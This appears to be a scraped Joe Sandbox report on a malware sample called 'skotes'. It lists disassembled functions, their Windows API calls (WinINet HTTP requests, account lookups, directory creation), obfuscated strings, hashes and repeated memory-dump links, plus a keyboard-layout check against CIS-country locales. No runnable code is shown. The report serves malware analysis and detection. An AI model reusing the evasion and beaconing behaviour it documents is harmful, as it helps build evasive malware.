Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1.$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
API String ID: 0-3519031087
Opcode ID: 8a2c681951295bfed127575f9e21d6b706781201c41a43305c69e4c8d66e4d7c
Instruction ID: 1c3ff1b54f356e58b5ee8f6a7e56b710a7132e424dc0d7369aaf0f86fb0628d7
Opcode Fuzzy Hash: 8a2c681951295bfed127575f9e21d6b706781201c41a43305c69e4c8d66e4d7c
Instruction Fuzzy Hash: 7582F370925288DBEF14EF68C9897CE7FB5AB06304F508188E805673C2D7759A98CFD2

Function 002C2517 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 374
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,002D6758), ref: 002C275C

Strings

Eastern Summer Time, xrefs: 002C27FA
Eastern Standard Time, xrefs: 002C27CB
Xg-, xrefs: 002C2705, 002C270B

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID: Eastern Standard Time$Eastern Summer Time$Xg-
API String ID: 565725191-2449143355
Opcode ID: 655b71239b17092a4e50d68df550df1b90c1e3406aa84e324d7b4e336469e5e4
Instruction ID: 484c55087f0212e48e69bd9e1af2a59236a0c65249b76962d4efd30bbda20613
Opcode Fuzzy Hash: 655b71239b17092a4e50d68df550df1b90c1e3406aa84e324d7b4e336469e5e4
Instruction Fuzzy Hash: 79C15871920246DBDB149F38DC85FEA7BADEF15350F24025DE8849B252EF708E29CB60

Function 002865E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00286680

Strings

GSTmfV==, xrefs: 00286728
RySfdMLx, xrefs: 0028669C
ISNmfV==, xrefs: 002867D1

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: GSTmfV==$ISNmfV==$RySfdMLx
API String ID: 1484870144-2309319047
Opcode ID: e0e3ab98f15e2fc94fae1e737ed6e2b795f5724df30acdc70430e9f692f052e3
Instruction ID: fc2bc5c0613f6f5223d119ffcd1d2a8744c47293744ae69c8b65d5e63995e93c
Opcode Fuzzy Hash: e0e3ab98f15e2fc94fae1e737ed6e2b795f5724df30acdc70430e9f692f052e3
Instruction Fuzzy Hash: EA91D2B59101189BDB28EF28CC89BDDB779EB45304F4445E9E50997282DB309BD88FA4

Function 0028EB4E Relevance: 31.9, APIs: 3, Strings: 14, Instructions: 2131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0028EB51
CreateDirectoryA.KERNEL32(00000000), ref: 0028EC83
GetFileAttributesA.KERNEL32(00000000), ref: 0028ED98

Strings

WTs=, xrefs: 002905CA
246122658369, xrefs: 0028F737, 0028FA14, 0028FE00, 002905E7
L1., xrefs: 0028F7E5
stoi argument out of range, xrefs: 002908C4
111, xrefs: 0028F7A0
FCQgKF==, xrefs: 0028FEE4
invalid stoi argument, xrefs: 002908B0
WDw=, xrefs: 0028F71D, 0028F9FA, 0028FDE3
FisgLnsCZO1i, xrefs: 0028FF19
9c9aa5, xrefs: 0028FB8E
GiQaT29tduF=, xrefs: 0028FEB6
#, xrefs: 00290624
mxo1L0x, xrefs: 0028EE84
UA==, xrefs: 0028EC41, 0028ED56, 0028EF89, 0028F2CE

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesFile$CreateDirectory
String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$L1.$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
API String ID: 1875963930-1908860934
Opcode ID: 97042de11a0de8634eaa583d7c1ad4643d6f8ddf81357450a04a6c131a3e3cdb
Instruction ID: 9255809cc5f2a3a023b5c890bff6f7dd5f069520282f16cc85db3a6f3ecae353
Opcode Fuzzy Hash: 97042de11a0de8634eaa583d7c1ad4643d6f8ddf81357450a04a6c131a3e3cdb
Instruction Fuzzy Hash: C6F27C71A211489BEF18EB38CDC979DBB76AF42304F54829CE408973D6DB358AE48F51

Function 0028BE30 Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 313
networksleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000005DC,3C8350B4,?,00000000), ref: 0028BEB8
InternetOpenW.WININET(002D8DC8,00000000,00000000,00000000,00000000), ref: 0028BEC8
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0028BEEB
HttpOpenRequestA.WININET(?,00000000), ref: 0028BF36
HttpSendRequestA.WININET(?,00000000), ref: 0028BFF5
InternetReadFile.WININET(?,?,000003FF,?), ref: 0028C0A7
InternetCloseHandle.WININET(?), ref: 0028C187
InternetCloseHandle.WININET(?), ref: 0028C18F
InternetCloseHandle.WININET(?), ref: 0028C197

Strings

RE1NXF==, xrefs: 0028BF0E
8HJUeIfzLo==, xrefs: 0028C3CB, 0028C623
stoi argument out of range, xrefs: 0028E4EA
8HJUeMD Lq5=, xrefs: 0028C465
invalid stoi argument, xrefs: 0028E4F4

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
API String ID: 2167506142-885246636
Opcode ID: 75ff365723d4a3cf73e7f30d7119f44093779efe7adccbb8b6d415fbf6aca10d
Instruction ID: 6674f845b60e4f0afd98be25047e8bca1ba431c5d275197351c7624436d90fcf
Opcode Fuzzy Hash: 75ff365723d4a3cf73e7f30d7119f44093779efe7adccbb8b6d415fbf6aca10d
Instruction Fuzzy Hash: 8FB126B06211189BDB24DF28CC84B9D7B79EF45304F6081ADF508972D6CB709AD0CFA4

Function 00286020 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 275
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0028617D
RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00286271

Strings

00000422, xrefs: 002860C9
00000423, xrefs: 002860FA
0000043f, xrefs: 0028612B
00000419, xrefs: 00286098
Keyboard Layout\Preload, xrefs: 00286054

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: EnumOpenValue
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 2571532894-3963862150
Opcode ID: ad0576bec7bc5bea403913eebb7315ff42dfd8a0301a293f40a26e567c4f78f8
Instruction ID: 2dafbed939a0eaadc3f502f500206d4966eba454e5572b23e56b352749defb7b
Opcode Fuzzy Hash: ad0576bec7bc5bea403913eebb7315ff42dfd8a0301a293f40a26e567c4f78f8
Instruction Fuzzy Hash: 29B1CD759112689BDB24EB64CC88BDEB779AB05300F4402D9E508E72D1DB74AFB88F94

Function 00287D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00287ED3

Strings

JjssOl==, xrefs: 0028813A
JjssPV==, xrefs: 002881E2
JjsrPl==, xrefs: 0028828A
JjsrQV==, xrefs: 00288092

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
